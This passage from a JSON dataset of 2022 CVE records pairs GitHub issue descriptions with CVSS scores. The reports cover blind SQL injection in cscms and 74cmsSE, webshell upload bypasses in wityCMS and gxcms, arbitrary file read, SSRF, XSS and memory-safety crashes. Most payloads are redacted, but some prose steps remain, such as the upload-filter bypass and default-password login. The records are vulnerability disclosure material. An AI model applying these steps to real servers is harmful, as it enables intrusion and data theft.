        "CVE_ID": "CVE-2022-29680",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/31",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/31",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:27:59Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a user to the member list after logging in. SQL injection vulnerability is generated when deleting the user. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29681",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/35",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/35",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:40:45Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a friendship link first. SQL injection vulnerability occurs when deleting the friendship link. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29682",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/36",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/36",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:43:49Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a video theme after logging in. SQL injection vulnerability is generated when deleting the video theme. The constructed malicious payload is as follows FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29683",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/34",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/34",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:36:23Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29684",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/33",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/33",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:33:15Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG FILETAG CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29686",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/29",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/29",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:14:41Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first. SQL injection vulnerability is generated when adding singers. The constructed malicious payload is as follows",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29687",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/30",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/30",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:21:31Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG APITAG by APITAG Details there is a Injection vulnerability exists in APITAG The administrator needs to add a member after logging in. SQL injection vulnerability is generated when deleting the member. The constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload to guess the database APITAG FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29688",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/27",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/27",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:08:46Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details There is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a song and then delete the song. When the song is recycled from the recycle bin, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG Discovery success makes the server sleep Construct payload database FILETAG FILETAG Because the first letter of the background database name is \"c\", it sleeps for NUMBERTAG seconds,so the vulnerablity exisit",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29689",
        "Issue_Url_old": "https://github.com/chshcms/cscms/issues/28",
        "Issue_Url_new": "https://github.com/chshcms/cscms/issues/28",
        "Repo_new": "chshcms/cscms",
        "Issue_Created_At": "2022-04-20T01:12:49Z",
        "description": "SQL injection vulnerability exists in Cscms music portal system NUMBERTAG Details there is a Injection vulnerability exists in APITAG After logging in, the administrator needs to add a singer first and then delete the singer. When deleting the singer, SQL injection vulnerability is generated. The injection point is ID, and the constructed malicious payload is as follows CODETAG FILETAG You can see that success makes the server sleep Construct payload database FILETAG FILETAG There is blind SQL injection. Because the database name is \"cscms\", the string returned by select APITAG starts with 'C', substr ((select + APITAG NUMBERTAG C' is true, and the verification is correct",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-29692",
        "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1578",
        "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1578",
        "Repo_new": "unicorn-engine/unicorn",
        "Issue_Created_At": "2022-04-01T09:53:58Z",
        "description": "Null pointer caused by UAF in unicorn NUMBERTAG Hello, :) Unicorn NUMBERTAG Python API Add APITAG to the hook function (uc_hook_mem_read_unmapped) Releasing the hook function will cause the null pointer dereference. I'm not sure if it's a UAF. APITAG is as follows ERRORTAG gdb debug ERRORTAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.8,
        "impactScore": 5.9,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29693",
        "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1586",
        "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1586",
        "Repo_new": "unicorn-engine/unicorn",
        "Issue_Created_At": "2022-04-11T07:30:52Z",
        "description": "Memory leaks caused by unexpected architecture in unicorn dev branch. Hi :) When we used unexpected architecture such as APITAG , there was a memory leak in unicorn2. APITAG ERRORTAG If we don't use APITAG , there will be a memory leak. ERRORTAG If we use APITAG , there will be a segmentation fault! ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29694",
        "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1588",
        "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1588",
        "Repo_new": "unicorn-engine/unicorn",
        "Issue_Created_At": "2022-04-12T12:06:38Z",
        "description": "Null pointer dereference in APITAG when HVA malloc failed. When we try to use APITAG to apply for super large memory, memory allocation in HAV fails, but succeeds in GVA. This inconsistency leads to null pointer dereference in APITAG releases the block requested by APITAG . APITAG ERRORTAG output ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29695",
        "Issue_Url_old": "https://github.com/unicorn-engine/unicorn/issues/1595",
        "Issue_Url_new": "https://github.com/unicorn-engine/unicorn/issues/1595",
        "Repo_new": "unicorn-engine/unicorn",
        "Issue_Created_At": "2022-04-16T09:35:23Z",
        "description": "Memory leaks caused by incomplete unicorn engine initialization.. Unicorn NUMBERTAG provide a new API ( APITAG ) that allows host to modify the architecture and mode of the CPU. However, this api doesn't determine whether the architecture and mode are supported by unicorn. Further more, Unicorn did not judge the result of engine initialization at the design stage. In other words, if we use unexpected architecture or mode to initialize unicorn engine, unicorn will alloc memory during initialization that will not be released. CODETAG Although APITAG is equal to zero, something is alloced in memory region such as APITAG . APITAG ERRORTAG Debug info ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29720",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/1",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/1",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-04-21T12:06:00Z",
        "description": "APITAG NUMBERTAG Arbitrary file read . Vulnerability Name: Arbitrary File Read Date of Discovery : PATHTAG Product version APITAG Download link\uff1a URLTAG Vulnerability Description: Arbitrary file reading is a kind of file operation vulnerability, generally arbitrary file reading vulnerability can read configuration information and even important files of the system. In severe cases, it may cause SSRF to roam to the intranet. Causes of vulnerabilities: Saves a function that reads a file The path to read the file is user controllable and is not checked or checked strictly The contents of the file were exported POC \uff1a GET PATHTAG HTTP NUMBERTAG Host: APITAG APITAG APITAG Sec Ch Ua: \" Not APITAG APITAG Sec Ch Ua Mobile NUMBERTAG Upgrade Insecure Requests NUMBERTAG User Agent: Mozilla NUMBERTAG APITAG NT NUMBERTAG Win NUMBERTAG APITAG (KHTML, like Gecko) APITAG Safari NUMBERTAG Accept: PATHTAG /\\ ; APITAG exchange;v=b3;q NUMBERTAG Sec Fetch Site: none Sec Fetch Mode: navigate Sec Fetch User NUMBERTAG Sec Fetch Dest: document Accept Encoding: gzip, deflate Accept Language: zh CN,zh;q NUMBERTAG Connection: close Code: PATHTAG FILETAG The \\$url is passed in the code, but there is no whitelist restriction on reading, so we can take advantage of: /.. / APITAG the parent directory) Reads the server file. PATHTAG FILETAG Prove: The following website uses APITAG FILETAG payload: APITAG Read the site database configuration file FILETAG And other file FILETAG Fix suggestion: Purify data: hard code or uniformly encode the file name parameters passed by the user, whitelist control of the file types, and reject parameters that contain malicious characters or null characters.",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29721",
        "Issue_Url_old": "https://github.com/PAINCLOWN/74cmsSE-Arbitrary-File-Reading/issues/2",
        "Issue_Url_new": "https://github.com/painclown/74cmsse-arbitrary-file-reading/issues/2",
        "Repo_new": "PAINCLOWN/74cmsSE-Arbitrary-File-Reading",
        "Issue_Created_At": "2022-04-23T02:09:56Z",
        "description": "SQL Injection vulnerability on NUMBERTAG cmsse. Exploit Title: SQL Injection vulnerability on APITAG Date of Discovery: PATHTAG Product APITAG Download link\uff1a URLTAG Vulnerability Description: APITAG has a time blind that allows an attacker to run malicious SQL statements on a database, which can be exploited to execute illegal SQL commands to obtain sensitive database data. FILETAG In the path PATHTAG is not strictly filtered for \\$keyword, resulting in SQL injection POC: URL1: FILETAG Payload\uff1a URLTAG As you can see from the figure below, the APITAG function is executed, and there is a time blind SQL FILETAG FILETAG When sleep NUMBERTAG FILETAG With the payload test above it is possible to delay the function being executed twice out of NUMBERTAG Time blinds are possible to guess the length of the database: Payload\uff1a URLTAG URLTAG FILETAG The database name of the website is NUMBERTAG cmsse, and the delay is exactly half the length of APITAG and the injection is successful FILETAG The same goes for the following test case URL2: APITAG payload: URLTAG URLTAG APITAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database: The injection was successful FILETAG FILETAG URL3\uff1a APITAG Payload\uff1a URLTAG URLTAG FILETAG FILETAG sleep NUMBERTAG FILETAG Guess the length of the database: The injection was successful as seen from the graph FILETAG The following are other test cases that testers can test on their own URL4: APITAG URL5: FILETAG URL6: FILETAG URL7: FILETAG URL8: FILETAG URL9: FILETAG URL NUMBERTAG APITAG URL NUMBERTAG FILETAG URL NUMBERTAG APITAG It's a time based SQL injection Suggest: Add a filter function to this parameter",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-29725",
        "Issue_Url_old": "https://github.com/Creatiwity/wityCMS/issues/161",
        "Issue_Url_new": "https://github.com/creatiwity/witycms/issues/161",
        "Repo_new": "creatiwity/witycms",
        "Issue_Created_At": "2022-04-22T05:27:54Z",
        "description": "There is a file upload vulnerability in the background settings page. The server build environment is windows After logging in to the background, click Settings, there is a file upload vulnerability in an ico image upload point, you can bypass the upload, upload the webshell through this point, and you can take down the server. Vulnerability location\uff1a URLTAG FILETAG APITAG the shell file and capture the APITAG Content Type to image/ico, filename to .php and php followed by spaces to bypass FILETAG APITAG the response packet is NUMBERTAG the file itself has been uploaded APITAG uploaded file is located in the \\upload\\settings directory, named FILETAG FILETAG APITAG connection is successful through the ice scorpion, and the server shell is obtained. FILETAG FILETAG topsec deepzz",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 8.8,
        "impactScore": 5.9,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29767",
        "Issue_Url_old": "https://github.com/adbyby/Files/issues/2",
        "Issue_Url_new": "https://github.com/adbyby/files/issues/2",
        "Repo_new": "adbyby/files",
        "Issue_Created_At": "2022-04-23T10:04:40Z",
        "description": "APITAG NUMBERTAG IPQ NUMBERTAG AP CP NUMBERTAG C1 APITAG APITAG / APITAG Master (git NUMBERTAG APITAG NUMBERTAG c NUMBERTAG f) FILETAG APITAG FILETAG \u6f0f\u6d1e\u89e6\u53d1\u65b9\u5f0f\uff1a \u901a\u8fc7\u8bbf\u95eehttp://\u3010\u8def\u7531ip NUMBERTAG FILETAG FILETAG FILETAG \u539f\uff1a FILETAG \u539f\u56e0\uff1a APITAG FILETAG FILETAG FILETAG \u4e34\u65f6\u4fee\u590d\u5efa\u8bae\uff1a \u4e00\uff1a\u4f7f\u7528iptables NUMBERTAG iptables A INPUT p tcp \u2013dport NUMBERTAG i <eth0 \u4f60\u7684\u516c\u7f51\u51fa\u53e3> j reject \u4e8c\uff1a\u5173\u95edadbyby FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29770",
        "Issue_Url_old": "https://github.com/xuxueli/xxl-job/issues/2836",
        "Issue_Url_new": "https://github.com/xuxueli/xxl-job/issues/2836",
        "Repo_new": "xuxueli/xxl-job",
        "Issue_Created_At": "2022-04-23T15:02:41Z",
        "description": "There is a stored XSS vulnerability in the task management of xxl job. Which version of XXL JOB do you using NUMBERTAG Expected behavior stroed XSS APITAG poc APITAG APITAG FILETAG NUMBERTAG press submit FILETAG NUMBERTAG SS attack occurs FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.4,
        "impactScore": 2.7,
        "exploitabilityScore": 2.3
    },
    {
        "CVE_ID": "CVE-2022-29779",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/485",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/485",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-16T09:40:33Z",
        "description": "SEGV APITAG in njs_value_own_enumerate. Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29780",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/486",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/486",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-21T02:29:41Z",
        "description": "SEGV in njs_array_prototype_sort . Environment OS : Linux leanderwang LC NUMBERTAG generic URLTAG SMP Mon Feb NUMBERTAG UTC NUMBERTAG APITAG Commit : URLTAG Version NUMBERTAG Build : NJS_CFLAGS=\"$NJS_CFLAGS fsanitize=address\" NJS_CFLAGS=\"$NJS_CFLAGS fno omit frame pointer\" APITAG ERRORTAG Stack dump ERRORTAG Credit xmzyshypnc( APITAG and P1umer( APITAG",
        "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 5.5,
        "impactScore": 3.6,
        "exploitabilityScore": 1.8
    },
    {
        "CVE_ID": "CVE-2022-29973",
        "Issue_Url_old": "https://github.com/relan/exfat/issues/185",
        "Issue_Url_new": "https://github.com/relan/exfat/issues/185",
        "Repo_new": "relan/exfat",
        "Issue_Created_At": "2022-05-01T23:02:44Z",
        "description": "Information disclosure in fuse exfat. Affected versions NUMBERTAG and latest code NUMBERTAG e4f NUMBERTAG Details: In the APITAG file system, each file has a stream extension with the following fields defined (among others): APITAG and APITAG ( URLTAG The former refers to the file size, the latter refers to the highest file offset written. According to the official APITAG specification, bytes after APITAG are undefined and \" FILETAG FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:L/AC:H/PR:L/UI:N/S:U/C:H/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 4.7,
        "impactScore": 3.6,
        "exploitabilityScore": 1.0
    },
    {
        "CVE_ID": "CVE-2022-29977",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/165",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/165",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2022-04-23T16:47:52Z",
        "description": "Assertion failure in stbi__jpeg_huff_decode, APITAG There is an assertion failure error in stbi__jpeg_huff_decode, APITAG CODETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-29978",
        "Issue_Url_old": "https://github.com/saitoha/libsixel/issues/166",
        "Issue_Url_new": "https://github.com/saitoha/libsixel/issues/166",
        "Repo_new": "saitoha/libsixel",
        "Issue_Created_At": "2022-04-25T06:12:49Z",
        "description": "FPE in sixel_encoder_do_resize, APITAG Description There is a floating point exception error in sixel_encoder_do_resize, APITAG in img2sixel NUMBERTAG Remote attackers could leverage this vulnerability to cause a denial of service via a crafted JPEG file. Version img2sixel NUMBERTAG commit id URLTAG APITAG Jan NUMBERTAG Reproduction ERRORTAG FILETAG Platform ERRORTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
        "severity": "MEDIUM",
        "baseScore": 6.5,
        "impactScore": 3.6,
        "exploitabilityScore": 2.8
    },
    {
        "CVE_ID": "CVE-2022-30007",
        "Issue_Url_old": "https://github.com/breezety/gxcms15/issues/1",
        "Issue_Url_new": "https://github.com/breezety/gxcms15/issues/1",
        "Repo_new": "breezety/gxcms15",
        "Issue_Created_At": "2022-04-25T12:58:33Z",
        "description": "A file upload vulnerability exists in the background. APITAG code Audit The vulnerability appears in the template management page in the background: FILETAG PATHTAG HTML file is received by filename, content is received by content, and then the data is sent to? S PATHTAG FILETAG Track? S = PATHTAG page PATHTAG class. PHP file, see the Update function to receive the filename and the content variables, only after receiving the two variables for judging whether it is empty, Data is written to the file directly using the write_file function without dangerous character detection for file names and contents, which means there is any file upload vulnerability. FILETAG APITAG exploit Log in to the background of the target website by admin default password admin NUMBERTAG or password blasting or even phishing, click Template Management to enter the PATHTAG directory, select any file and click Edit: FILETAG Enter the EDIT page, enter the PHP test code in the file content form, start the APITAG tool to capture packages, and click Submit: FILETAG After APITAG catches the package, change the filename suffix to PHP and click APITAG the package\" : FILETAG FILETAG file was created successfully, and the PHP test code was successfully executed. FILETAG FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
        "severity": "HIGH",
        "baseScore": 7.2,
        "impactScore": 5.9,
        "exploitabilityScore": 1.2
    },
    {
        "CVE_ID": "CVE-2022-30034",
        "Issue_Url_old": "https://github.com/mher/flower/issues/1217",
        "Issue_Url_new": "https://github.com/mher/flower/issues/1217",
        "Repo_new": "mher/flower",
        "Issue_Created_At": "2022-05-26T18:33:06Z",
        "description": "Security Vulnerabilities in Flower: APITAG Authentication Bypass and Lack of CSRF Protections ( CVETAG ). Ref: APITAG Flower is unauthenticated by default and lacks CSRF protections Flower's APITAG support is vulnerable to a bypass allowing anyone to authenticate regardless of the APITAG restriction Due to a lack of response from the maintainer, these issues were publicly disclosed on NUMBERTAG May NUMBERTAG along with a PR NUMBERTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:H",
        "severity": "HIGH",
        "baseScore": 8.6,
        "impactScore": 4.7,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30049",
        "Issue_Url_old": "https://github.com/getrebuild/rebuild/issues/460",
        "Issue_Url_new": "https://github.com/getrebuild/rebuild/issues/460",
        "Repo_new": "getrebuild/rebuild",
        "Issue_Created_At": "2022-04-27T12:45:46Z",
        "description": "SSRF vulnerability. Location of vulnerability APITAG request parameter type is the URL FILETAG APITAG APITAG Httpurl. Get to trigger SSRF vulnerability FILETAG Vulnerability proof screenshot FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30288",
        "Issue_Url_old": "https://github.com/ohler55/agoo/issues/109",
        "Issue_Url_new": "https://github.com/ohler55/agoo/issues/109",
        "Repo_new": "ohler55/agoo",
        "Issue_Created_At": "2022-05-04T03:22:12Z",
        "description": "Agoo Fragment Cycle Security Vulnerability. Agoo versions NUMBERTAG and below do not support request validations meaning cycle fragment requests lead to unbounded results causing instances of Agoo to crash. Sample exploit script: CODETAG For more information see: FILETAG Spec ref: URLTAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30334",
        "Issue_Url_old": "https://github.com/brave/brave-browser/issues/18071",
        "Issue_Url_new": "https://github.com/brave/brave-browser/issues/18071",
        "Repo_new": "brave/brave-browser",
        "Issue_Created_At": "2021-09-13T23:57:55Z",
        "description": "Strip referrer and origin in cross origin requests from a APITAG origin. If a cross origin request originates from a APITAG service, we should match the Tor Browser behavior and: omit the Referer header send a value of null for the Origin header whenever present (e.g. in the case of a POST request) Same origin requests should follow our normal referrer policy URLTAG . Test page: FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
        "severity": "MEDIUM",
        "baseScore": 5.3,
        "impactScore": 1.4,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30427",
        "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/8",
        "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/8",
        "Repo_new": "gphper/ginadmin",
        "Issue_Created_At": "2022-05-04T09:57:30Z",
        "description": "Directory Traversal Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG the incoming path value is not filtered, resulting in directory traversal. ERRORTAG POC URLTAG Attack results pictures FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30428",
        "Issue_Url_old": "https://github.com/gphper/ginadmin/issues/9",
        "Issue_Url_new": "https://github.com/gphper/ginadmin/issues/9",
        "Repo_new": "gphper/ginadmin",
        "Issue_Created_At": "2022-05-04T11:09:36Z",
        "description": "Read Any File Vulnerability. Vulnerability file address APITAG line NUMBERTAG APITAG The incoming path value is not filtered, resulting in arbitrary file reading ERRORTAG POC APITAG Attack results pictures FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
        "severity": "HIGH",
        "baseScore": 7.5,
        "impactScore": 3.6,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30500",
        "Issue_Url_old": "https://github.com/jflyfox/jfinal_cms/issues/35",
        "Issue_Url_new": "https://github.com/jflyfox/jfinal_cms/issues/35",
        "Repo_new": "jflyfox/jfinal_cms",
        "Issue_Created_At": "2022-05-07T02:48:35Z",
        "description": "SQLI vul1. There is a SQLI vul in background APITAG route is as following FILETAG vulnerable argument passing is as following FILETAG final injection result with sqlmap FILETAG",
        "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
        "severity": "CRITICAL",
        "baseScore": 9.8,
        "impactScore": 5.9,
        "exploitabilityScore": 3.9
    },
    {
        "CVE_ID": "CVE-2022-30503",
        "Issue_Url_old": "https://github.com/nginx/njs/issues/478",
        "Issue_Url_new": "https://github.com/nginx/njs/issues/478",
        "Repo_new": "nginx/njs",
        "Issue_Created_At": "2022-03-01T10:21:25Z",
